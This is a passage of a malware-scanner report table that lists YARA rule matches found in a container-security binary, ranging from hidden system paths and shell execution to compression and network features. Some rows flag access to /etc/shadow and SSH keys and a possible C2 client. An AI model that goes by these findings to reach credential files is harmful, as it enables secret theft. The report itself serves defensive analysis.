[unknown_ip](https://github.com/search?q=unknown_ip&type=code) | +| MEDIUM | [ref/path/etc/hosts](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-hosts.yara#etc_hosts) | references /etc/hosts | [/etc/hosts](https://github.com/search?q=%2Fetc%2Fhosts&type=code) | +| MEDIUM | [ref/path/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/hidden.yara#static_hidden_path) | hidden path in a system directory | [/meminfo/etc/timezone/dev/.udev](https://github.com/search?q=%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev&type=code)
[/usr/local/bin/.nvcontainerRunnin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunnin&type=code) | +| MEDIUM | [ref/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/home.yara#home_path) | references path within /home | [/home/.](https://github.com/search?q=%2Fhome%2F.&type=code) | +| MEDIUM | [ref/path/root](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/root.yara#root_path_val) | path reference within /root | [/root/%shostLookupOrder](https://github.com/search?q=%2Froot%2F%25shostLookupOrder&type=code)
[/root//proc/self/cgroup1192092895507812559604644775390625invalid](https://github.com/search?q=%2Froot%2F%2Fproc%2Fself%2Fcgroup1192092895507812559604644775390625invalid&type=code)
[/root/0x%08xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.](https://github.com/search?q=%2Froot%2F0x%2508xcountsAliyunD.2.14D.3.10D.3.11D.3.12D.3.13D.3.14D.3.15D.3.&type=code)
[/root/Switch](https://github.com/search?q=%2Froot%2FSwitch&type=code)
[/root/containers](https://github.com/search?q=%2Froot%2Fcontainers&type=code)
[/root/etc/crio/crio.conf.d/00-default.confUnable](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-default.confUnable&type=code)
[/root/etc/crio/crio.conf.d/00-defaultRunning](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-defaultRunning&type=code)
[/root/etc/crio/crio.conf/run/containerd/containerd.sockDirectory](https://github.com/search?q=%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fcontainerd.sockDirectory&type=code)
[/root/etc/hostnameusr/lib/os-releaseetc/centos-releaseetc/redhat-relea](https://github.com/search?q=%2Froot%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fcentos-releaseetc%2Fredhat-relea&type=code)
[/root/etc/hostsImage](https://github.com/search?q=%2Froot%2Fetc%2FhostsImage&type=code)
[/root/etc/resolv.confFMON](https://github.com/search?q=%2Froot%2Fetc%2Fresolv.confFMON&type=code)
[/root/kube-schedulerUnknown](https://github.com/search?q=%2Froot%2Fkube-schedulerUnknown&type=code)
[/root/sys/fs/aufs/si_%s227373675443232059478759765625SendMsg](https://github.com/search?q=%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_%25s227373675443232059478759765625SendMsg&type=code) | +| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.%d4e](https://github.com/search?q=%2Ftmp%2Fdp_client.%25d4e&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/block_accessGRP](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fblock_accessGRP&type=code)
[/tmp/kube_master.sh/tmp/kube_worker.sh%sbench/workload/%sGRPC](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.sh%25sbench%2Fworkload%2F%25sGRPC&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/neuvector/certs/internal/Failed](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fneuvector%2Fcerts%2Finternal%2FFailed&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-1.23/kube-apiservercontainers](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainers&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code) | +| MEDIUM | [ref/path/usr/local](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-local.yara#usr_local_bin_path) | path reference within /usr/local/bin | [/usr/local/bin/.nvcontainerRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunning&type=code)
[/usr/local/bin/SHD](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FSHD&type=code)
[/usr/local/bin/admin-assembly-too](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fadmin-assembly-too&type=code)
[/usr/local/bin/agentListenSocket](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FagentListenSocket&type=code)
[/usr/local/bin/consulgrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fconsulgrpc&type=code)
[/usr/local/bin/controllercontext](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fcontrollercontext&type=code)
[/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code)
[/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernetes.pod.nameFailed](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernetes.pod.nameFailed&type=code)
[/usr/local/bin/host.tmplNode](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fhost.tmplNode&type=code)
[/usr/local/bin/kube_master_1_0_0.tmpl/usr/local/bin/kube_worker_1_0_0.tmplresc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplresc&type=code)
[/usr/local/bin/kube_master_1_2_0.tmpl/usr/local/bin/kube_worker_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_4_1.tmpl/usr/local/bin/kube_worker_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_5_1.tmpl/usr/local/bin/kube_worker_1_5_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_gke_1_0_0.tmpl/usr/local/bin/kube_worker_gke_1_0_0.](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_gke_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.&type=code)
[/usr/local/bin/kube_master_ocp_4_3.tmpl/usr/local/bin/kube_worker_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kube_master_ocp_4_5.tmpl/usr/local/bin/kube_worker_ocp_4_5.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl&type=code)
[/usr/local/bin/kube_runner.tmplCannot](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_runner.tmplCannot&type=code)
[/usr/local/bin/kube_worker_1_0_0.tmplreschedule](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplreschedule&type=code)
[/usr/local/bin/kube_worker_1_2_0.tmpl/usr/local/bin/kube_master_1_0_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_4_1.tmpl/usr/local/bin/kube_master_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_5_1.tmpl/usr/local/bin/kube_master_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_gke_1_0_0.tmplDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.tmplDocker&type=code)
[/usr/local/bin/kube_worker_ocp_4_3.tmplexpected](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmplexpected&type=code)
[/usr/local/bin/kube_worker_ocp_4_5.tmpl/usr/local/bin/kube_master_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin/kubecis_1_0_0.remGet](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_0_0.remGet&type=code)
[/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_5_1.rem/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_5_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_6_0.remController](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_6_0.remController&type=code)
[/usr/local/bin/kubecis_gke_1_0_0.remDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_gke_1_0_0.remDocker&type=code)
[/usr/local/bin/kubecis_ocp_4_5.rem/usr/local/bin/kubecis_ocp_4_3.remUnable](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_5.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_3.remUnable&type=code)
[/usr/local/bin/monitor/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernete](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fmonitor%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernete&type=code)
[/usr/local/bin/nstoolscontainer-docker-bench](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fnstoolscontainer-docker-bench&type=code)
[/usr/local/bin/opacontext.Backgroundentering](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fopacontext.Backgroundentering&type=code)
[/usr/local/bin/pathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FpathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha&type=code)
[/usr/local/bin/progvar/lib/dpkg/statusno](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fprogvar%2Flib%2Fdpkg%2Fstatusno&type=code)
[/usr/local/bin/rh_runner.tmpl/usr/local/bin/container.tmplRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Frh_runner.tmpl%2Fusr%2Flocal%2Fbin%2Fcontainer.tmplRunning&type=code)
[/usr/local/bin/scannerPROC](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerPROC&type=code)
[/usr/local/bin/scannerTask/sbin/xtables-legacy-multiccBalancerWrapper](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerTask%2Fsbin%2Fxtables-legacy-multiccBalancerWrapper&type=code)
[/usr/local/bin/sigstore-interfacegrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fsigstore-interfacegrpc&type=code)
[/usr/local/bin/tcpdumpservice](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ftcpdumpservice&type=code)
[/usr/local/binFA](https://github.com/search?q=%2Fusr%2Flocal%2FbinFA&type=code) | +| MEDIUM | [ref/path/var/run](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/crio/](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2F&type=code)
[/var/run/docker.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2F&type=code)
[/var/run/dockershim.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2F&type=code)
[/var/run/openvswitch/](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2F&type=code)
[/var/run/secrets/](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2F&type=code) | +| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [not foundNo interface!!](https://github.com/search?q=not+foundNo+interface%21%21&type=code)
[number println!!](https://github.com/search?q=number+println%21%21&type=code)
[ontain alphanumerical characters onlyexplicitly tagged !!](https://github.com/search?q=ontain+alphanumerical+characters+onlyexplicitly+tagged+%21%21&type=code) | +| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [TxHeartbeatErrors](https://github.com/search?q=TxHeartbeatErrors&type=code) | +| MEDIUM | [ref/words/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/intercept.yara#interceptor) | References interception | [interceptor](https://github.com/search?q=interceptor&type=code) | +| MEDIUM | [ref/words/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/server_address.yara#server_address) | references a 'server address', possible C2 client | [extensionserverAddressByClientCIDRsdeletionGracePer](https://github.com/search?q=extensionserverAddressByClientCIDRsdeletionGracePer&type=code)
[preconditionsserverAddressincludeObjectfieldSelectorman](https://github.com/search?q=preconditionsserverAddressincludeObjectfieldSelectorman&type=code)
[server_address](https://github.com/search?q=server_address&type=code) | +| MEDIUM | [ref/words/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/spoof.yara#spoof) | references spoofing | [DeserializeVfSpoofchk](https://github.com/search?q=DeserializeVfSpoofchk&type=code) | +| MEDIUM | [secrets/shadow](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/shadow.yara#etc_shadow) | accesses /etc/shadow | [/etc/shadow](https://github.com/search?q=%2Fetc%2Fshadow&type=code) | +| MEDIUM | [secrets/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh/usr/local/binFA](https://github.com/search?q=.ssh%2Fusr%2Flocal%2FbinFA&type=code) | +| MEDIUM | [security_controls/linux/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/security_controls/linux/iptables.yara#iptables) | [interacts with the iptables firewall](https://www.netfilter.org/projects/iptables/) | [iptables](https://github.com/search?q=iptables&type=code) | +| MEDIUM | [shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code)
[/bin/dash](https://github.com/search?q=%2Fbin%2Fdash&type=code)
[/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | +| LOW | [compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | +| LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | +| LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | +| LOW | [encoding/json/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code) | +| LOW | [encoding/json/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-encode.yara#JSONEncode) | encodes JSON | [MarshalJSON](https://github.com/search?q=MarshalJSON&type=code) | +| LOW | [env/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TEMP.yara#tmpdir) | tmpdir | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| LOW | [env/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code)
[os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [writeRawFile](https://github.com/search?q=writeRawFile&type=code) | +| LOW | [fs/link/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | +| LOW | [fs/link/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/loopback.yara#loopback) | uses loopback pseudo-device files | [/dev/loop](https://github.com/search?q=%2Fdev%2Floop&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | +| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code) | +| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [ioutil/tempfile](https://github.com/search?q=ioutil%2Ftempfile&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [kernel/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/acct.yara#acct) | switch process accounting on or off | [radius-acct](https://github.com/search?q=radius-acct&type=code) | +| LOW | [kernel/cpu/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [kernel/hostname/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | +| LOW | [kernel/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | +| LOW | [kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | +| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | +| LOW | [kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code) | +| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | +| LOW | [net/hostname/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostname-resolve.yara#cannot_resolve) | resolve network host name to IP address | [cannot resolve](https://github.com/search?q=cannot+resolve&type=code) | +| LOW | [net/http/accept/encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | +| LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-auth.yara#http_auth) | makes HTTP requests with basic authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | +| LOW | [net/http2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | +| LOW | [net/http_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http_proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | +| LOW | [net/ip/send/unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code)
[syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code) | +| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
